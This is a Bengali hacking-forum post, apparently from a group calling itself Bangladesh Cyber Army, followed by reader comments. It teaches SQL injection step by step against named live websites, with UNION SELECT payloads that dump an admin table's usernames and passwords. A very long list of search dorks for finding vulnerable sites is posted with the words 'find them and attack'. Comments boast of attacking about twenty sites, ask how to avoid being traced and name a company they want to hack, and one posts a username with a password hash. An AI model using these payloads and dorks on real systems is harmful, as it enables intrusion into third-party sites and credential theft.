সহজ ভাষায় বলতে গেলে SQL Inj3cti0n হলো এমন একটি code inj3cti0n কৌশল যা কোনো সাইটের ডাটাবেজের সিকিউরিটি কে ভেঙ্গে তা থেকে ইনফরমেশন বের করতে পারে।
না। SQL Inj3cti0n তখনি কাজ করবে যখন কোনো সাইটে SQL error থাকবে।
যেই সব সাইটে id=value থাকে ধরুন
http://www.site.com/news.php?id=5
সাধারণত এই সব সাইটে SQL error থাকে। কোনো সাইটে SQL error এভাবেই দেখাবে না, error দেখার জন্য আপনাকে url এর শেষে একটি '(string) দিতে হবে।
উদাহরণঃ http://www.bayviewhotelni.com/news.php?id=3 এটি হচ্ছে আসল লিঙ্ক, এই লিঙ্কে যখন আপনি ব্রাউজারে লোড করবেন তখন কোনো error আসবে না। যখন আপনি url এর শেষে একটি '(string) দিবেন তখন ঠিকই error আসবে।
http://www.bayviewhotelni.com/news.php?id=3'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3''' at line 1
অথবা অনেক সময় দেখতে পারবেন যখন ' বসিয়েছেন তখন সাইটে যদি কোনো ছবি/ডাটা মিস করে তাহলে ও অই সাইটে SQL error আছে।
অর্থাৎ বোঝা গেলো এই সাইটে SQL error আছে। তাই আমরা এই সাইটটি কে SQL Inj3cti0n করেন হ্যাক করতে পারবো।
প্রথমে আমরা মজিলাতে একটি এডন ইন্সটল করবো যার নাম হচ্ছে HaCkBar. এই এডনটি ব্যবহার করলে কিছু কমান্ড দিতে সহজ হয়।
ডাউনলোড করে নিন এখান থেকে : https://addons.mozilla.org/en-us/firefox/addon/hackbar/
ইন্সটল করার পরেই দেখবেন আপনার ব্রাউজারে এডনটি দেখা যাচ্ছে।
আপনি যখন SQL error কোনো সাইটকে SQL Inj3cti0n করতে যাবেন তখন আপনার প্রথম কাজ হবে সাইটের ডাটাবেজে মোট কয়টি কলাম আছে তা বের করা। আর বের করার পদ্ধতি হলো order by কমান্ড।
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 1--
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 2--
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 3--
এভাবে যেতে থাকবেন যতক্ষণ পর্যন্ত কোনো Err0r না আসে।
http://www.sparkleappealdorset.org/supporter.php?id=7 order by 11--
দিলে কিছু লিখা অদৃশ্য হয়ে যায় অর্থাৎ এই সাইটটিতে মোট 10 টি কলাম আছে।
এখন আমাদের দেখতে হবে এই সাইটের ১০ টি কলামের মধ্যে কতটি কলাম vulnerable. যেই সব কলাম vulnerable সেই সব কলাম থেকেই ডাটাবেজ এর ইনফরমেশন বের করা যাবে। আমরা Union Select কমান্ড ব্যবহার করে সাইটের vulnerable কলাম গুলা বের করবো।
প্রথমে union select তারপরে যে কইটি কলাম সে কলাম গুলা ঠিক এভাবে বসাতে হবে। আর id=value er আগে একটি - চিহ্ন বসাতে হবে যেমন- http://www.sparkleappealdorset.org/supporter.php?id=-7
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,2,3,4,5,6,7,8,9,10--
যে কোনো একটি vulnerable কলামে আমরা SQL কমান্ড বসাবো যাতে আমরা ডাটাবেজের ইনফরমেশন বের করতে পারি। কোনো সাইটের ডাটাবেজ এর ভার্শন যদি 4 হয় তাহলে তা ম্যানুয়ালি inj3ct করা যাবে না। তখন টুলস ব্যবহার করতে হবে like havij । আর যদি 5 হয় তাহলে আমরা ম্যানুয়ালি inj3ct করতে পারবো।
এই সাইটটিতে অনেক গুলা vulnerable কলাম আমাদের যে কোনো একটিকে বাছাই করে নিতে হবে।
ধরি আমরা ২ নাম্বার কলাম থেকে ডাটাবেজ ভার্শন বের করবো।
তাহলে syntax টি হবে
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,version(),3,4,5,6,7,8,9,10--
vulnerable কলামে version() রিপ্লেস করলেই ডাটাবেজের ভার্শন চলে আসবে।
vulnerable কলামের জাগায় group_concat(table_name) এবং এক দম শেষ কলামের পরে from information_schema.tables where table_schema=database()--
তাহলে syntax টি দাড়ায়
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
যে টেবিল গুলো আমরা পেলাম তা হলো event,galleryImage,login_admin,supporter
এখানে এডমিন টেবিল হচ্ছে login_admin, এই টেবিল থেকে আমরা এডমিনের ইউসার এবং পাসওয়ার্ড বের করবো।
vulnerable কলামের জাগায় group_concat(column_name) এবং এক দম শেষ কলামের পরে from information_schema.columns where table_name=0xএডমিন টেবিল নামের হেক্স কোড--
তাহলে syntax টি দাড়ায়
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x6c6f67696e5f61646d696e--
vulnerable কলামের জাগায় concat{যে কলাম গুলো পেয়েছেন সে গুলো(সব গুলো কলাম নয় সুধু মাত্র ইউসার এবং পাসওয়ার্ড এর কলাম)} এবং এক দম শেষ কলামের পরে কোন টেবিল থেকে এই কলাম পেয়েছেন সেই টেবিলের নাম।
http://www.sparkleappealdorset.org/supporter.php?id=-7+UNION+SELECT 1,concat(uid,0x3a,pwd),3,4,5,6,7,8,9,10 from login_admin--
বাস পেয়ে গেলেন সাইটের এডমিন পাসওয়ার্ড । এখন পুরো সাইটি আপনার হাতে যা খুশি তাই করুন। তবে মারাত্মক কোনো ক্ষতি না করাই ভালো। সহজেই হয়ে গেলেন একজন ওয়েব হ্যাকার 😛
কিছু কথাঃ এই টপিকটা সহজভাবে বোঝানোর চেস্টা করেছি তাই ভাল লাগলে অবশ্যই ধন্যবাদ জানাবেন xD
বিঃদ্রঃ এই পোস্টটির কপিরাইট সম্পূর্ণ সংরক্ষিত এবং বাংলাদেশ সাইবার আর্মি এর অনুমতি ছাড়া আর কোথাও এটা লিখা/পোস্ট করা যাবে না।
We Are Bangladesh Cyber Army 😀
আমি Script Kiddie। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 14 বছর যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 6 টি টিউন ও 199 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 2 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
who am i ?
ইন্টারনেট এস্কপ্লোরার ও গুগল ক্রোমে পদ্ধতিটা কাজ করবেনা ? যার সাইট হ্যাক করব সেকি বুঝতে পারবে যে তার সাইট হ্যাক হয়েছে ।
করবে তবে hackbar এডনটি কাজ করবে না, শুধু মজিলা এবং কমেটবার্ড এ এই এডনটি কাজ করে।
হা বুঝবে যদি এডমিন প্যানেল এর আইপি লগ চেক করে + যদি আপনি সাইটে লিখে দেন হ্যাকড বাই Disitalman. bd তাহলে তো সহজেই বোঝার কথা।
joss !!! ami ai prothom karo tunes pore comment korlam.
Excellent tunes.
we need more………..
Sql inject এর total doc's গুলা দিয়ে দিলাম। খুজে নিয়ে হামলা চালান। 😀
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
আচ্ছা হ্যাক করার পর যদি আমার সাইন থেকে যায়,বা আমাকে সনাক্ত করে ফেলে তাহলেতো সমসশা।কি করা যায়?
josssssshhhhh হইসে । ধন্যবাদ । আমি Windows 7 use করি । Windows Explorer.exe এর problem এর কারনে PC রিস্টার্ট নেয় । এটা কি কারণে হয় তা জানতে চাই ? এবং এর সমাধান চাই । কোন উপায় থাকলে জানাবেন ।
খুব ভাল…..খুব ভাল….. এটাইতো দেখতে চাই …… BCA এর প্রতি শুভ কামনা সবসময় থাকবে। আমার একটি আবেদন আপনারা সবাইকে হ্যাকিং শেখান। বাংলাদেশের প্রতিটি ঘরে যেন একজন করে ইথিক্যাল হ্যাকার থাকে, যাতে করে অন্যের ক্ষতির হাত থেকে নিজে ও দেশের সাইবার ক্ষেত্রকে বাচানো যায়…
আপনার কমেন্ট টা পরে অনেক ভালো লাগলো। আমরা চেস্টা করে যাবো বাকিটা আপনাদের উপর। আপনারা পাশে থাকলে সব কিছুই সম্ভভ 😀
এখানে অল্প কিছুদিন ভিজিট করছি। সেজন্যে আমার যদি ভুল হয় তাহলে মাফ করবেন। আসলে আমি বলতে চাইছি যে এখানে অনেক হ্যাকিং টিউটোরিয়াল দেখলাম। যারা এগুলো দিচ্ছে তারা হয়তো ভালোর জন্যেই দিচ্ছে। কিন্তু, কথা হল এই টিওটোরিয়াল গুলির ব্যাবহার যদি সঠিক না হয়?? ইথিক্যাল হ্যাকিং কয়জন মনে রাখে?? কিছুদিন আগে আমি একজনকে Sql inject বোঝালাম আর সে কি করলো জানেন?? বাংলাদেশ এর একটা নামকরা টিভি চ্যানেল এর ওয়েব সাইট হ্যাক দিলো।
আমার উপর আবার রাগ করবেন না। নতুনদের ধংস করতে না শিখিয়ে গড়তে শেখান কি ভালো না?? আপনি হয়ত শেখাচ্ছেন সতর্ক করার জন্যে। কিন্ত অন্যেরা সেটার ব্যাবহার করতে পারে অন্যের ক্ষতির উদ্দেশ্যে।
আমার ব্যাক্তিগত একটা অভিজ্ঞতার কথা বলি, আমি জখন প্রথম প্রোগ্রামিং এর দিকে ঝুকলাম, তখন লাভালেয়ার স্ক্রিপ্ট দিয়ে একটি সামাজিক যোগাযোগ এর ওয়াপসাইট বানিয়েছিলাম। এত আনন্দ পেয়েছিলাম যে কয়েক রাত ঠিকমত ঘুমতে পারিনাই। বন্ধুদের জানালাম, তারা এসে জয়েন করলো।
একদিন ঘুম থেকে উঠে দেখি সাইট হ্যাকেড!! এত কস্ট করে বানানো ফোরাম টপিক, পোস্ট…… মেম্বার… কিচ্ছুই নেই।
যদি খারাপ দিকটাই আগে চিন্তা করি তাহলে ভালো কিছু করা সম্ভব নয়। আর আপনার সাইট হ্যাক হইসে হয়তো আপনার কোনো ত্রুটি ছিলো। ভালো + মন্দ এই দুইটি দিক সব কিছু তেই আছে। এখন যে যেটা বেছে নেই।
OSADHARON AK TUNE DEKHLAM.@ALL TUNER VAIERA, + hacker hote ki ki jante hobe? Plz sbay aktu aawaj din!
দারুন বস!!! খুবই ভালো লাগলো। চালিয়ে যান। আমরা আছি। অবশ্যই ইথিক্যাল হ্যাকার হবার অপেক্ষায়। শুভ কামনা রইলো। ভালো থাকুন সবসময়। ভালোবাসায়..বন্ধনে।
ফাটাফাটি টিউন। অনেক ভালো লাগলো। অনেকদিন পর টিউন পরে মজা পেলাম। এখন বাংলার দামাল ছেলেরা চাইলেই যে কোন ওয়েব সাইট হ্যাক করতে পারে ভাবতেই ভালো লাগে। শুভ কামনা রইলো।ভালো থাকুন। ধন্যবাদ আপনাকে এবং বাংলাদেশ সাইবার আর্মিকে।
অসাধারন টিউন অনেক সুন্দর লিখেছেন,
আপনাকে অসংখ্য ধন্যবাদ সুন্দর টিউনটির জন্য।
**কেউ দয়া করে এই সবের অপব্যবহার করবেন্না**
আগে তোমাকে ৫০ পয়সা জরিমানা করলাম।কারণ এই হ্যাকিং এর ভূতটি বেশ কিছুদিন হলো মাথা থেকে চলে গিয়েছিলো কিন্তু এত সুন্দর টিউন দেখে আর নিজেকে সামলাতে পারলাম না।কিন্তু এখন পর্যন্ত ২০ ওয়েবসাইটের হামলা চালাইলাম কিন্তু সফল হইলাম না 🙁 🙁 আমি কি অদ্যও সফল হবো?
জরিমানার অংক দেখেতো ভয় পেয়ে গেলাম 😛 হা অবশ্যই সফল হবেন। পরের পর্বে লিখবো কিভাবে সফল হতে পারবেন । 😀 আর ধন্যবাদ আপনাকে কমেন্ট করার জন্য।
টিউন তো নয় তো আগুনের গোলারে, টিউন তো নয় তো আগুনের গোলা । Script Kiddie কে করলাম প্রিয়। ………………
আমার খুব আশা, আমি হ্যাকিং শিখতে পারব তো। বহুত চেষ্টা করছি কোনটা সফল হয়নাই।
এবার সফল হব তো?
ভাই দারুন একটা টিউন দিলেন। আপনাকে কমেন্ট না করলে অন্যায় হয়ে যায় তাই বাধ্য হয়ে রেজি: করলাম এখানে।
আশা করি আরো অনেক কিছু পাবো আপনার কাছ থেকে।
Script Kiddie@ ami apna k nia proud fill kortase je amra o pari bairer jekono country sathe palla dea jitte
bai apnar tune coment na korle moha onnay hoye jabe, tai na lore parlam na
avro install thakar por-o bangla likhte pari na
bai ami akta MLM companir website hack korte cai. jara manusher sathe batpari kore kuti kuti taka hatiye nicche.
এডমিন টেবিল থেকে ইউজার এবং পাসওয়ার্ড বের করার নিয়ম :-
এর আগে সব পারসি কিন্তু পরে র পারি নাই।
DORK আসলে জানিনা জানাবেন কেউ।ইচ্ছা আসে সিল কিন্তু এখন ও পারি না কিছু করতে
ভাই password পাইসি…কিন্তু যেসব সাইট login এ করা জযায় না ওইসব সাইট login এ করব কেমনে ??????? …..ektu bolen plzzzzzzzzzzZZZZZZZZZZZZZ
vaia akdom last step par howar por to amar eirokom dekhacche……..(amin ar pass jekhane dekhanor kotha)……ar jodi password pai..tahole tarpor login korbo kotha theke??? tar to kono jayga dekhtesi na…
VecDiana$:4f3120624f28e5d8e21d4d3cc1a030b38a2e747347f287ea1fa9089cc593137e
প্লিজ, চেইন টিউন চালিয়ে যান। আমিও হ্যাকিং শিখতে চাই এবং ব্যাসিক সম্পর্কে একটু জ্ঞান আছে। তবে ওয়েব হ্যাকিং সম্পর্কে আমি জানতাম না, এখন মনে হয় আপনার এই পদ্ধতি ট্রাই দেয়া লাগে।
